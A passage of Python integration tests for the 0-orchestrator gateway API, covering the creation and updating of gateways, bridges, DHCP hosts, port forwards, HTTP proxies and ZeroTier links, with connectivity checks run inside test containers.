self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid_1))
self.core0_client.client.container.terminate(int(uid))
@unittest.skip('ssh to vm issue')
def test003_create_gateway_with_xlan_xlan_vm(self):
""" GAT-125
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with vlan and vlan as nics on node (N0), should succeed.
#. Bind a new vm to vlan(1).
#. Bind a new vm to vlan(2).
#. Make sure that those two containers can ping each others.
"""
nics_type = [{
'type':'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
vm1_mac_addr = nics[1]['dhcpserver']['hosts'][1]['macaddress']
vm1_ip_addr = nics[1]['dhcpserver']['hosts'][1]['ipaddress']
vm2_mac_addr = nics[2]['dhcpserver']['hosts'][1]['macaddress']
vm2_ip_addr = nics[2]['dhcpserver']['hosts'][1]['ipaddress']
test_container_mac_addr = nics[1]['dhcpserver']['hosts'][0]['macaddress']
nics[2]['dhcpserver']['hosts'][0]['macaddress'] = test_container_mac_addr
## set cloudinit
cloudinit = {"chpasswd": {"expire": false},
"ssh_pwauth":true, "users":
[{"plain_text_passwd": "<PASSWORD>", "lock-passwd": false,"name": "gig", "shell": "/bin/bash", "sudo": "ALL=(ALL) ALL"}]}
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
nics = [{'id': nics[1]['id'], 'type': nics[1]['type'], 'macaddress': vm1_mac_addr}]
self.create_vm(nics=nics)
nics = [{'id': nics[2]['id'], 'type': nics[2]['type'], 'macaddress': vm2_mac_addr}]
self.create_vm(nics=nics)
self.lg.info(' [*] create test container')
nics = [{'type': nics[1]['type'], 'id': nics[1]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr},
{'type': nics[2]['type'], 'id': nics[2]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr}]
uid = self.core0_client.client.container.create(self.flist, nics=nics).get()
test_container = self.core0_client.client.container.client(uid)
time.sleep(60)
response = test_container.bash(
'sshpass -p rooter ssh gig@%s -oStrictHostKeyChecking=no ping %s' % (vm1_ip_addr, vm2_ip_addr)).get()
self.assertEqual(response.state, 'SUCCESS', response.stderr)
response = test_container.bash(
'sshpass -p rooter ssh gig@%s -oStrictHostKeyChecking=no ping %s' % (vm2_ip_addr, vm1_ip_addr)).get()
self.assertEqual(response.state, 'SUCCESS', response.stderr)
def test005_create_gateway_with_bridge_xlan_container(self):
""" GAT-127
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vxlan as nics on node (N0), should succeed.
#. Bind a new container to vlan(1).
#. Verify that this container has public access.
"""
bridge_name = 'b' + self.random_string()
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
self.lg.info(' [*] Create container')
nics_container = [{"type": nics[1]['type'],
"id": nics[1]['id'],
"hwaddr": nics[1]['dhcpserver']['hosts'][0]['macaddress'],
"config": {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(self.nodeid, nics=nics_container)
self.assertEqual(response.status_code, 201, " [*] Can't create container.")
container = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(container)
time.sleep(5)
response = container.bash('ping -w3 8.8.8.8').get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
@unittest.skip('ssh to vm issue')
def test007_create_gateway_with_bridge_xlan_vm(self):
""" GAT-129
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vlan as nics on node (N0), should succeed.
#. Bind a new vm to vlan(1).
#. Verify that this vm has public access.
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201)
vm1_mac_addr = nics_type[1]['dhcpserver']['hosts'][0]['macaddress']
vm1_ip_addr = nics_type[1]['dhcpserver']['hosts'][0]['ipaddress']
test_container_mac_addr = nics_type[1]['dhcpserver']['hosts'][1]['macaddress']
nics = [{'id': nics[1]['id'], 'type': nics[1]['type'], 'macaddress': vm1_mac_addr}]
self.create_vm(nics=nics)
self.lg.info(' [*] create test container')
nics = [{'type': nics[1]['type'], 'id': nics[1]['id'], 'config': {'dhcp': True}, 'hwaddr': test_container_mac_addr}]
uid = self.core0_client.client.container.create(self.flist, nics=nics).get()
test_container = self.core0_client.client.container.client(uid)
test_container.bash('apt install ssh -y; apt install sshpass -y')
time.sleep(60)
response = test_container.bash('ssh gig@%s -oStrictHostKeyChecking=no ping -w3 8.8.8.8' % vm1_ip_addr).get()
self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid))
def test009_create_gateway_dhcpserver(self):
""" GAT-131
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and xlan as nics on node (N0), should succeed.
#. Specify a dhcpserver for container and vm in this GW
#. Create a container and vm to match the dhcpserver specs
#. Verify that container and vm ips are matching with the dhcpserver specs.
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201, response.content)
nics_container = [{
'type': nics[1]['type'],
'name': 'test',
'id': nics[1]['id'],
'hwaddr': nics[1]['dhcpserver']['hosts'][0]['macaddress'],
'config': {'dhcp': True}
}]
uid = self.core0_client.client.container.create(self.flist, nics=nics_container).get()
time.sleep(5)
container_1 = self.core0_client.client.container.client(int(uid))
container_1_nics = container_1.info.nic()
interface = [x for x in container_1_nics if x['name'] == 'test']
self.assertNotEqual(interface, [])
self.assertIn(nics[1]['dhcpserver']['hosts'][0]['ipaddress'], [x['addr'][:-3] for x in interface[0]['addrs']])
self.assertEqual(nics[1]['dhcpserver']['hosts'][0]['macaddress'], interface[0]['hardwareaddr'])
self.core0_client.client.container.terminate(int(uid))
@unittest.skip('https://github.com/zero-os/0-orchestrator/issues/1102')
def test010_create_gateway_httpproxy(self):
""" GAT-132
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway with bridge and vlan as nics and httpproxy with two containers on node (N0), should succeed.
#. Create two containers to for test the httpproxy's configuration
#. Verify that the httprxoy's configuration is working right
"""
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, networkMode='static', nat=True)
self.assertEqual(response.status_code, 201, response.content)
time.sleep(3)
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': self.bridge_data['name'],
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics_data = self.get_gateway_nic(nics_types=nics_type)
httpproxies = [
{
"host": "container1",
"destinations": ['http://{}:1000'.format(nics_data[1]['config']['cidr'][:-4] + '10/24')],
"types": ['http', 'https']
},
{
"host": "container2",
"destinations": ['http://{}:2000'.format(nics_data[1]['config']['cidr'][:-4] + '20/24')],
"types": ['http', 'https']
}
]
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics_data, httpproxies=httpproxies)
self.assertEqual(response.status_code, 201, response.content)
nics = [{'type': nics_type[1]['type'],
'id': nics_data[1]['id'],
'config': {'dhcp': False,
'gateway': nics_data[1]['config']['cidr'][:-3],
'cidr': nics_data[1]['config']['cidr'][:-4] + '10/24'}}]
uid_1 = self.core0_client.client.container.create(self.flist, nics=nics).get()
container_1 = self.core0_client.client.container.client(int(uid_1))
nics = [{'type': nics_type[1]['type'],
'id': nics_data[1]['id'],
'config': {'dhcp': False,
'gateway': nics_data[1]['config']['cidr'][:-3],
'cidr': nics_data[1]['config']['cidr'][:-4] + '20/24'}}]
uid = self.core0_client.client.container.create(self.flist, nics=nics).get()
container_2 = self.core0_client.client.container.client(int(uid))
self.lg.info('Make sure that those two containers can ping each others')
container_1.bash('python3 -m http.server 1000')
container_2.bash('python3 -m http.server 2000')
time.sleep(2)
response = container_1.bash(
'python3 -c "from urllib.request import urlopen; urlopen(\'{}\')"'.format('http://container2')).get()
self.assertEqual(response.state, 'SUCCESS')
response = container_2.bash(
'python3 -c "from urllib.request import urlopen; urlopen(\'{}\')"'.format('http://container1')).get()
self.assertEqual(response.state, 'SUCCESS')
self.core0_client.client.container.terminate(int(uid_1))
self.core0_client.client.container.terminate(int(uid))
def test011_create_gateway_portforwards(self):
""" GAT-133
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create bridge(B0) , should succeed.
#. Create gateway with bridge and vlan as nics should succeed.
#. Set a portforward form srcip:80 to destination:80
#. Create one container as a destination host
#. Start any service in this container
#. Using core0_client try to request this service and make sure that u can reach the container
"""
bridge_name = 'b' + self.random_string()
self.lg.info(" [*] Create gateway with bridge and vlan as nics should succeed.")
nics_type = [{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': ''
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': ''
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
self.lg.info(' [*] Create bridge (B1) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
portforwards = [
{
"srcport": 5000,
"srcip": nics[0]['config']['cidr'][:-3],
"dstport": 5000,
"dstip": nics[1]['dhcpserver']['hosts'][0]['ipaddress'],
"protocols": [
"tcp"
]
}
]
self.lg.info("[*] Create rule on port 80")
try:
self.core0_client.client.nft.open_port(5000)
except:
pass
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics, portforwards=portforwards)
self.assertEqual(self.response.status_code, 201, response.content)
self.lg.info(' [*] Create container')
nics_container = [{"type": nics[1]['type'],
"id": nics[1]['id'],
"hwaddr": nics[1]['dhcpserver']['hosts'][0]['macaddress'],
"config": {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(self.nodeid, nics=nics_container)
self.assertEqual(response.status_code, 201, " [*] Can't create container.")
container = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(container)
file_name = self.random_string()
self.lg.info(" [*] Start any service in this container")
response = container.bash("echo test > {}.txt".format(file_name)).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
container.bash("python3 -m http.server 5000")
time.sleep(5)
url = 'http://{}:5000/{}.txt'.format(nics[0]['config']['cidr'][:-3], file_name)
response = self.core0_client.client.bash('wget %s' % url).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
response = self.core0_client.client.bash('ls | grep {}.txt'.format(file_name)).get()
self.assertEqual(response.state, "SUCCESS", response.stderr)
def test012_create_two_gateways_zerotierbridge(self):
""" GAT-134
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create bridge(B0) with true nat, should succeed.
#. Create zerotier network.
#. Create two Gws (Gw1)(Gw2) and link them with zerotier bridge.
#. Create (C1),(C2) containers for each Gw .
#. Verify that each created 'GW containers' hosts can reach each others.
"""
self.lg.info(" [*] Create zerotier network.")
nwid = self.create_zerotier_network(default_config=False)
bridge_name = self.random_string()
self.lg.info(" [*] Create two Gws and link them with zerotier bridge.")
nics_type = [
{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name,
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': nwid
}
]
nics = self.get_gateway_nic(nics_types=nics_type)
c1_ip = nics[1]["dhcpserver"]["hosts"][0]["ipaddress"]
self.lg.info(' [*] Create bridge (B0) on node (N0), should succeed with 201')
setting = {"cidr": nics[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics)
self.assertEqual(self.response.status_code, 201, self.response.content)
self.lg.info(" [*] create (c1) containers for each Gw. ")
c1_nics = [{'type': nics[1]['type'],
'id': nics[1]['id'],
"hwaddr": nics[1]["dhcpserver"]["hosts"][0]["macaddress"],
'config': {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(nodeid=self.nodeid, nics=c1_nics)
self.assertEqual(response.status_code, 201)
c1_client = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(c1_client)
bridge_name_2 = self.random_string()
nics_type = [
{
'type': 'bridge',
'gateway': True,
'dhcp': False,
'bridge_name': bridge_name_2,
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': nwid
}
]
nics_2 = self.get_gateway_nic(nics_types=nics_type)
nics_2[1]['config'] = nics[1]['config']
nics_2[1]['dhcpserver'] = nics[1]['dhcpserver']
c2_ip = nics_2[1]["dhcpserver"]["hosts"][1]["ipaddress"]
self.lg.info(' [*] Create bridge (B0) on node (N0), should succeed with 201')
setting = {"cidr": nics_2[0]['config']['gateway'] + '/24'}
response, self.bridge_data = self.bridges_api.post_nodes_bridges(self.nodeid, name=bridge_name_2, networkMode='static', nat=True, setting=setting)
self.assertEqual(response.status_code, 201, response.content)
self.response, self.data = self.gateways_api.post_nodes_gateway(node_id=self.nodeid, nics=nics_2)
self.assertEqual(self.response.status_code, 201, self.response.content)
self.lg.info(" [*] create (c2) containers for each Gw. ")
c2_nics = [{'type': nics[1]['type'],
'id': nics[1]['id'],
"hwaddr": nics[1]["dhcpserver"]["hosts"][1]["macaddress"],
'config': {"dhcp": True}}]
response, self.container_data = self.containers_api.post_containers(nodeid=self.nodeid, nics=c2_nics)
self.assertEqual(response.status_code, 201)
c2_client = self.core0_client.get_container_client(self.container_data['name'])
self.assertTrue(c2_client)
response = c1_client.bash('ping -c 5 %s' % c2_ip).get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
response = c2_client.bash('ping -c 5 %s' % c1_ip).get()
self.assertEqual(response.state, 'SUCCESS')
self.assertNotIn("unreachable", response.stdout)
class TestGatewayAPIUpdate(TestcasesBase):
def setUp(self):
super().setUp()
nics_type = [
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': True,
'dhcp': False,
'bridge_name': '',
'zerotierbridge': False
},
{
'type': random.choice(['vlan', 'vxlan']),
'gateway': False,
'dhcp': True,
'bridge_name': '',
'zerotierbridge': False
}
]
self.nics = self.get_gateway_nic(nics_types=nics_type)
self.core0_client.create_ovs_container()
self.response, self.data = self.gateways_api.post_nodes_gateway(self.nodeid, nics=self.nics)
self.assertEqual(self.response.status_code, 201)
self.gw_name = self.data['name']
self.gw_domain = self.data['domain']
def tearDown(self):
self.lg.info(' [*] Delete all node {} gateways'.format(self.nodeid))
if 'data' in self.__dict__.keys():
self.gateways_api.delete_nodes_gateway(self.nodeid, self.gw_name)
super().tearDown()
def test001_list_gateways(self):
""" GAT-098
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. List all node (N0) gateways, (GW0) should be listed.
"""
self.lg.info(' [*] List node (N0) gateways, (GW0) should be listed')
response = self.gateways_api.list_nodes_gateways(self.nodeid)
self.assertEqual(response.status_code, 200)
self.assertIn(self.gw_name, [x['name'] for x in response.json()])
def test002_get_gateway_info(self):
""" GAT-099
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. Get gateway (GW0) info, should succeed.
"""
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
def test003_delete_gateway(self):
""" GAT-100
**Test Scenario:**
#. Get random node (N0), should succeed.
#. Create gateway (GW0) on node (N0), should succeed.
#. Delete gateway (GW0), should succeed.
#. List node (N0) gateways, (GW0) should not be listed.
"""
self.lg.info(' [*] Delete gateway (GW0), should succeed')
response = self.gateways_api.delete_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List node (N0) gateways, (GW0) should not be listed')
response = self.gateways_api.list_nodes_gateways(self.nodeid)
self.assertEqual(response.status_code, 200)
self.assertNotIn(self.gw_name, [x['name'] for x in response.json()])
def test004_stop_gw(self):
""" GAT-135
**Test Scenario:**
#. Stop the running gatway
#. Verify its status
"""
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'running')
response = self.gateways_api.post_nodes_gateway_stop(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'halted')
response = self.gateways_api.post_nodes_gateway_start(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
def test005_start_gw(self):
""" GAT-136
**Test Scenario:**
#. Stop the running gateway and make sure that its status has been changed
#. Start the gateway
#. Verify its status
"""
response = self.gateways_api.post_nodes_gateway_stop(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'halted')
response = self.gateways_api.post_nodes_gateway_start(nodeid=self.nodeid, gwname=self.gw_name)
self.assertEqual(response.status_code, 204, response.content)
response = self.containers_api.get_containers(nodeid=self.nodeid)
for container in response.json():
if self.gw_name == container['name']:
self.assertEqual(container['status'], 'running')
def test006_update_gw_nics_config(self):
""" GAT-137
**Test Scenario:**
#. Use put method to update the nics config for the gw
#. List the gw and make sure that its nics config have been updated
"""
nics = list(self.nics)
nics[0]['config']['cidr'] = "192.168.10.10/24"
nics[0]['config']['gateway'] = "192.168.10.1"
nics[1]['config']['cidr'] = "192.168.20.2/24"
del nics[1]['dhcpserver']
data = dict(self.data)
data['nics'] = nics
self.lg.info(' [*] Use put method to update the nics config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its nics config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(nics, response.json()['nics'])
def test007_update_gw_portforwards_config(self):
""" GAT-138
**Test Scenario:**
#. Use put method to update the portforwards config for the gw
#. List the gw and make sure that its portforwards config have been updated
"""
self.data['portforwards'] = [
{
"protocols": ['udp', 'tcp'],
"srcport": random.randint(100, 1000),
"srcip": "192.168.1.1",
"dstport": random.randint(100, 1000),
"dstip": "192.168.2.100"
}
]
del self.data['name']
self.lg.info(' [*] Use put method to update the portforwards config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its portforwards config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['portforwards'], response.json()['portforwards'])
def test008_update_gw_dhcpserver_config(self):
""" GAT-139
**Test Scenario:**
#. Use put method to update the dhcpserver config for the gw
#. List the gw and make sure that its dhcpserver config have been updated
"""
self.data['nics'][1]['dhcpserver'] = {
"nameservers": ["8.8.8.8"],
"hosts": [
{
"macaddress": self.randomMAC(),
"hostname": self.random_string(),
"ipaddress": self.data['nics'][1]['config']['cidr'][:-4] + '10'
}
]
}
del self.data['name']
self.lg.info(' [*] Use put method to update the dhcpserver config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204, response.content)
self.lg.info(' [*] List the gw and make sure that its dhcpserver config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['nics'][1]['dhcpserver'], response.json()['nics'][1]['dhcpserver'])
def test009_update_gw_httpproxies_config(self):
""" GAT-140
**Test Scenario:**
#. Use put method to update the dhcpserver config for the gw
#. List the gw and make sure that its httpproxies config have been updated
"""
self.data['httpproxies'] = [
{
"host": self.random_string(),
"destinations": ["192.168.200.10:1101"],
"types": ['https', 'http']
}
]
del self.data['name']
self.lg.info(' [*] Use put method to update the dhcpserver config for the gw')
response = self.gateways_api.update_nodes_gateway(self.nodeid, self.gw_name, self.data)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List the gw and make sure that its dhcpserver config have been updated')
response = self.gateways_api.get_nodes_gateway(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertEqual(self.data['httpproxies'], response.json()['httpproxies'])
def test010_create_list_portforward(self):
""" GAT-114
**Test Scenario:**
#. Create new portforward table using firewall/forwards api
#. Verify it is working right
"""
body = {
"protocols": ['udp', 'tcp'],
"srcport": random.randint(1, 2000),
"srcip": "192.168.1.1",
"dstport": random.randint(1, 2000),
"dstip": "192.168.2.5"
}
self.lg.info(' [*] Create new portforward table using firewall/forwards api')
response = self.gateways_api.post_nodes_gateway_forwards(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201, response.content)
self.lg.info(' [*] Verify it is working right')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertIn(body, response.json())
def test012_delete_portforward(self):
""" GAT-115
**Test Scenario:**
#. Create new portforward table using firewall/forwards api
#. List portfowards table
#. Delete this portforward config
#. List portforwards and verify that it has been deleted
"""
body = {
"protocols": ['udp', 'tcp'],
"srcport": random.randint(1, 2000),
"srcip": "192.168.1.1",
"dstport": random.randint(1, 2000),
"dstip": "192.168.2.5"
}
self.lg.info(' [*] Create new portforward table using firewall/forwards api')
response = self.gateways_api.post_nodes_gateway_forwards(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201, response.content)
self.lg.info(' [*] List portfowards table')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertIn(body, response.json())
self.lg.info(' [*] Delete this portforward config')
forwardid = '{}:{}'.format(body['srcip'], body['srcport'])
response = self.gateways_api.delete_nodes_gateway_forward(self.nodeid, self.gw_name, forwardid)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List portfowards table')
response = self.gateways_api.list_nodes_gateway_forwards(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.assertNotIn(body, response.json())
def test013_add_dhcp_host(self):
""" GAT-116
**Test Scenario:**
#. Add new dhcp host to an interface
#. List dhcp hosts
#. Verify that is the list has the config
"""
self.lg.info(' [*] Add new dhcp host to an interface')
interface = [x for x in self.nics if x.get('dhcpserver')][0]['name']
hostname = self.random_string()
macaddress = self.randomMAC()
ipaddress = '192.168.2.3'
body = {
"hostname": hostname,
"macaddress": macaddress,
"ipaddress": ipaddress
}
response = self.gateways_api.post_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, body)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List dhcp hosts')
response = self.gateways_api.list_nodes_gateway_dhcp_hosts(self.nodeid, self.gw_name, interface)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that is the list has the config')
dhcp_host = [x for x in response.json() if x['hostname'] == hostname]
self.assertNotEqual(dhcp_host, [])
for key in body.keys():
self.assertTrue(body[key], dhcp_host[0][key])
def test014_delete_dhcp_host(self):
""" GAT-117
**Test Scenario:**
#. Add new dhcp host to an interface
#. List dhcp hosts
#. Delete one host form the dhcp
#. List dhcp hosts
#. Verify that the dhcp has been updated
"""
self.lg.info(' [*] Add new dhcp host to an interface')
interface = [x for x in self.nics if x.get('dhcpserver')][0]['name']
hostname = self.random_string()
macaddress = self.randomMAC()
ipaddress = '192.168.2.3'
body = {
"hostname": hostname,
"macaddress": macaddress,
"ipaddress": ipaddress
}
response = self.gateways_api.post_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, body)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] Delete one host form the dhcp')
response = self.gateways_api.delete_nodes_gateway_dhcp_host(self.nodeid, self.gw_name, interface, macaddress)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List dhcp hosts')
response = self.gateways_api.list_nodes_gateway_dhcp_hosts(self.nodeid, self.gw_name, interface)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that the dhcp has been updated')
dhcp_host = [x for x in response.json() if x['hostname'] == hostname]
self.assertEqual(dhcp_host, [])
def test015_create_new_httpproxy(self):
""" GAT-118
**Test Scenario:**
#. Create new httpproxy
#. List httpproxy config
#. Verify that is the list has the config
"""
self.lg.info(' [*] Add new httpproxy host to an interface')
body = {
"host": self.random_string(),
"destinations": ['http://192.168.2.200:5000'],
"types": ['http', 'https']
}
response = self.gateways_api.post_nodes_gateway_httpproxy(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] List dhcp httpproxy')
response = self.gateways_api.list_nodes_gateway_httpproxies(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that is the list has the config')
httpproxy_host = [x for x in response.json() if x['host'] == body['host']]
self.assertNotEqual(httpproxy_host, [])
for key in body.keys():
self.assertTrue(body[key], httpproxy_host[0][key])
def test016_delete_httpproxyid(self):
""" GAT-119
**Test Scenario:**
#. Create new httpproxy
#. Delete httpproxy id
#. List dhcp hosts
#. Verify that the dhcp has been updated
"""
self.lg.info(' [*] Create new httpproxy')
body = {
"host": self.random_string(),
"destinations": ['http://192.168.2.200:500'],
"types": ['http', 'https']
}
response = self.gateways_api.post_nodes_gateway_httpproxy(self.nodeid, self.gw_name, body)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Delete httpproxy id')
proxyid = body['host']
response = self.gateways_api.delete_nodes_gateway_httpproxy(self.nodeid, self.gw_name, proxyid)
self.assertEqual(response.status_code, 204)
self.lg.info(' [*] List httpproxies')
response = self.gateways_api.list_nodes_gateway_httpproxies(self.nodeid, self.gw_name)
self.assertEqual(response.status_code, 200)
self.lg.info(' [*] Verify that the httpproxies has been updated')
httpproxy_host = [x for x in response.json() if x['host'] == body['host']]
self.assertEqual(httpproxy_host, [])
```
#### File: testcases/advanced_tests/test04_etcd.py
```python
import random, time
from testcases.testcases_base import TestcasesBase
import unittest
class Test_etcd(TestcasesBase):
def setUp(self):
super().setUp()
number_of_free_disks, disk_type = self.get_max_available_free_disks([self.nodeid])
storageclusters = self.storageclusters_api.get_storageclusters()
if storageclusters.json() == []:
if number_of_free_disks == []:
self.skipTest(' [*] No free disks to create storagecluster')
self.lg.info(' [*] Deploy new storage cluster (SC0)')
response, data = self.storageclusters_api.post_storageclusters(
nodes=[self.nodeid],
driveType=disk_type,
servers=random.randint(1, number_of_free_disks)
)
self.assertEqual(response.status_code, 201)
self.storagecluster = data['label']
else:
self.storagecluster = storageclusters.json()[0]
self.lg.info(' [*] Create vdiskstorage (VDS0)')
response, self.vdiskstoragedata = self.vdisks_api.post_vdiskstorage(storagecluster=self.storagecluster)
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Import Image (IMG0) for (VDS0)')
response, self.imagedata = self.vdisks_api.post_import_image(vdiskstorageid=self.vdiskstoragedata["id"])
self.assertEqual(response.status_code, 201)
self.lg.info(' [*] Create vdisk (VD0)')
response, self.vdisk = self.vdisks_api.post_vdisks(vdiskstorageid=self.vdiskstoragedata["id"], imageid=self.imagedata["imageName"])
self.assertEqual(response.status_code, 201)
